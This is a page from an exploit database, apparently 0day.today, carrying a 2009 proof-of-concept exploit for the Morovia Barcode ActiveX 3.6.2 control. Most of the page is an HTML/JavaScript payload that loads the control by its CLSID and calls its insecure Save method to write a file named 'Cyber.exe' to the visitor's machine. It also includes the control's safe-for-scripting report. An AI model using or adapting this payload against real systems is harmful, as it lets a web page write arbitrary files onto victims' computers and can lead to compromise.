[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Morovia Barcode ActiveX 3.6.2 (MrvBarCd.dll) Insecure Method Exploit

Author
Cyber-Zone
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9397
Category
remote exploits
Date add
13-03-2009
Platform
unsorted
====================================================================
Morovia Barcode ActiveX 3.6.2 (MrvBarCd.dll) Insecure Method Exploit
====================================================================




<HTML>
Morovia Barcode ActiveX Control 3.6.2 (MrvBarCd.dll) Insecure Method Exploit<br>
<br>
 Description There is Insecure Method in (Save) fonction<br>
Download Product : http://download.morovia.com/demo/MrvBarCd_Demo_V3.4.0.0.msi<br>
Found By : Cyber-Zone<br>
Tested Under : sp2 fr <br>
SP thnx To : Hussin X , Jiko ( Che7ta4Ever My Best Friend ) No-Exploit TeaM , StaCk ( Thanx4Help ) ...All Mgharba ...
<!--
Report for Clsid: {18B409DA-241A-4BD8-AC69-B5D547D5B141}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  
-->

<title>Exploited By : Cyber-Zone </title>
<BODY>
 <object id=cyber classid="clsid:{18B409DA-241A-4BD8-AC69-B5D547D5B141}"></object>

<SCRIPT>

function Do_it()
 {
     File = "Cyber.exe"
   cyber.Save(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>
</body>
</HTML>



#  0day.today [2024-06-16]  #